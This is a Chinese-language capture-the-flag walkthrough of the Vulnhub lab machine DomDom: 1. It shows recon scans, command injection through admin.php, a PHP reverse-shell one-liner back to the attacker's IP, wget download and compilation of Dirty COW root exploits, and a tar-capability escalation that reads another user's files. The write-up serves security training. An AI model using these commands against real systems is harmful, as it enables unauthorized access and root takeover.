Vulnhub靶机：DOMDOM_ 1_vulnhub domdom-1

介绍

系列：DomDom（此系列仅此一台）
发布日期：2019年7月11日
难度：初级
Flag : 未知
学习：命令执行、脏牛提权
靶机地址：https://www.vulnhub.com/entry/domdom-1,328/

信息收集

主机发现

nmap -sn 192.168.40.0/24
1

主机信息探测

信息探测：nmap -A -p- 192.168.40.152，只开放了80等端口。

测试网站

打开网站，如下图

没啥有价值的信息，先目录扫描走一波呢？
从靶机的描述页面中得知网站是php的，因此着重测试php

gobuster dir -u http://192.168.40.152 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100 -x php
1

1. 直接访问网站根目录，并填写所有的内容框，点击“Execute”按钮后会跳转到index.php
2. 直接访问/admin.php得到如下图的暗语

3. 测试修改请求地址

直接访问网站根目录，抓包得到（已经自动跳转到index.php）

修改index.php为admin.php，得到线索，要添加cmd

命令执行-反弹shell

上文得知网站存在命令执行，靶场又是php的，就使用php反弹shell

kali开启监听：
nc -nvlp 1234

命令执行：
php -r '$sock=fsockopen("192.168.40.129",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
1
2
3
4
5

注意：命令执行的内容需要做编码，使用Ctrl+U快捷键

得知靶机上存在python3，获取交互式shell(如果后期使用wget下载文件失败，请退出交互式shell)，通过passwd文件得知靶机上存在domom用户

先去domom用户的家目录溜达溜达，发现了一个文件，但是不让我看。

脏牛提权

下载提权脚本：https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

1. kali开启web服务：python3 -m http.server 80
2. 靶机下载文件，并运行：

wget http://192.168.40.129/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
1
2
3

看到了脏牛漏洞

方式1

1. 下载提权脚本：https://github.com/gbonacini/CVE-2016-5195
2. kali开启web：python3 -m http.server 80
3. 靶机下载提权脚本：

wget http://192.168.40.129/CVE-2016-5195-master.zip
unzip CVE-2016-5195-master.zip
cd CVE-2016-5195-master
make
./dcow -s
1
2
3
4
5

方式2

1. kali下载exp，并开放web服务

wget https://www.exploit-db.com/download/40616
mv 40616 cowroot.c
python3 -m http.server 80
1
2
3

2. 靶机下载文件，编译并运行

wget http://192.168.40.129/cowroot.c
gcc cowroot.c -o cowroot -pthread
chmod +x cowroot
./cowroot
1
2
3
4

其他提权方式

在之前的靶机：CONNECT THE DOTS: 1 中，介绍过使用 /sbin/getcap -r / 2>/dev/null 查找设备上特殊权限的文件，这里可以试一试。然后就发现了 tar ，嘿嘿，可以把 CONNECT THE DOTS: 1 中的提权方法抄过来

tar -cvf domom.tar /home/domom
tar -xvf domom.tar
1
2

打包 /home/domom，之后对其解压，经过搜寻，发现了root的密码，提权成功。

参考

linux Capabilities简介–#setcap cap_net_raw,cap_net_admin=eip /a.out